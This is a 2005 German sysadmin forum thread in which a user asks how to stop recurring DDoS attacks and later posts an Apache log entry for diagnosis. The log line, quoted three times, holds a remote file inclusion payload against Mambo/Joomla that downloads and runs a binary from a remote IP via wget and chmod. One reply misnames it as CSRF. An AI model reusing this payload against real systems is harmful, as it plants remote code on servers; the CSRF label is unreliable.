RootForum Community

Resources for System-Administrators
https://www.rootforum.org/forum/

Ã?fters mal DDOs Attacken

https://www.rootforum.org/forum/viewtopic.php?t=38335

Page 1 of 1

Ã?fters mal DDOs Attacken

Posted: 2005-12-27 17:15
by wecki
Hallo,

ich werde in der letzten zeit öfters mal (alle 2 Wochen) Opfer einer DDOS Attacke.

Was kann ich dagegen tun bzw. wie verhindere ich diese?

Die DDOS Attacken hauen gewaltig in meinen traffic rein und außerdem legen Sie mich immer für ca. 12 Stunden lahm.

Gibt es irgend etwas wie ich mittels IP tables oder ähnlichem sowas verhindern kann?

Unter dem motto 3 Anfragen in einer Sekunde und die IP wird geblockt?
Und erst in 12 Stunden wieder freigegeben?

Sind alles naürlich nur fiktive Zahlen...

Aber irgendwas muss ich doch amchen können...

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-27 17:42
by dodolin
Gegen den Traffic kannst du gar nichts machen, ausser dein ISP bietet eine externe, vorgeschaltete Firewall^WPaketfilter an. Wenn der Traffic aber auf Ports kommt, auf denen du Dienste anbieten möchtest, hast du selbst damit keine Chance. IPtables und Co. wird dir auch nicht helfen, da der ISP den Traffic eigentlich immer schon zählt, bevor er deinen Rechner erreicht.

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-27 18:08
by wecki
Und gegen den erfolgreichen DOS kann ich auch nichts tun?

Oder wehnigstens den Dienst abschalten wenn ein DOS bemerkt wird und mich dann Benachrichtigen?

Wie soll ich nun vorgehen?

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-27 22:24
by tischi
könntest zum beispiel mit der bwbar dein out/in traffic generieren, mit einem Script auslesen und dann mit If schleifen maßnahmen ergreifen.

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-27 23:44
by Roger Wilco
Tischi wrote:[...]und dann mit If schleifen [...]
Argh, woher kommt dieser Ausdruck nur? :evil: (Wenn es ein kotzendes Smily gäbe, würde ich das jetzt benutzen...)

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-27 23:54
by aubergine
Roger Wilco wrote:
Tischi wrote:[...]und dann mit If schleifen [...]
Argh, woher kommt dieser Ausdruck nur? :evil: (Wenn es ein kotzendes Smily gäbe, würde ich das jetzt benutzen...)

Turbo Pascal :-D

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-27 23:55
by Roger Wilco
Ich habe damals auch in Turbo Pascal programmiert, aber If Schleifen sind mir weder in Pascal noch einer anderen Sprache über den Weg gelaufen.

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-28 00:05
by aubergine
Unsere !Lehrerin! damals hat immer die wörter If und When Schleifen benutzt.

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-28 00:10
by wecki
Ich glaub ich hab was zur DOS gefunden...




Allerdings weis ich net was des sein soll...

Sieht leicht aus wie als hätte wer versucht was via wget zu laden und des dann auszuführen....

Code: Select all

[Tue Dec 27 00:30:15 2005] [error] [client 65.202.73.207] request failed: erroneous characters after protocol string: GET /ind
ex2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute
_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\
x01.1
Wenn ich alle %20 durch leerzeichen ersetze bekommt es form:

Code: Select all

[Tue Dec 27 00:30:15 2005] [error] [client 65.202.73.207] request failed: erroneous characters after protocol string: GET /ind
ex2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute
_path=http://209.136.48.69/cmd.gif?&cmd=cd /tmp;wget 209.136.48.69/micu;chmod 744 micu;./micu;echo YYY;echo|  HTTP\
x01.1
Aber was soll des sein? micu... noch nie gehört...[/quote]

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-28 09:15
by legato
Ich poste ja unger offtopic, aber den muss ich jetzt bringen:
Image
If Schleifen :roll:

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-28 09:48
by killerboy
Hi,

wenn ich mich recht entsinne ist das ein Angriff auf Mambo, da jemand versucht mit der Variablen "mosConfig_absolute_path" fremden Code einzuschleusen...

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-28 09:50
by aubergine
Ja schon klar das es eine Bedingung oder Verzweigung ist und keine Schleife.

Meine Posts sollten wohl sowas wie "Computer Umgangssprache" ausdrücken.

*Müsst euch nit aufregen, is umsonst*
:arrow: 8)

Re: Ã?fters mal DDOs Attacken

Posted: 2005-12-28 10:19
by Anonymous
wecki wrote:

Code: Select all

[Tue Dec 27 00:30:15 2005] [error] [client 65.202.73.207] request failed: erroneous characters after protocol string: GET /ind
ex2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute
_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\
x01.1
[/quote]

Das nennt sich CrossSite Request Frogeries. Der Angreifer versucht auf das Backend deines CMS (Joomla oder Mambo dürfte das sein, laut URL) zuzugreifen.
http://de.wikipedia.org/wiki/Cross-Site_Request_Forgery
All times are UTC+01:00
Page 1 of 1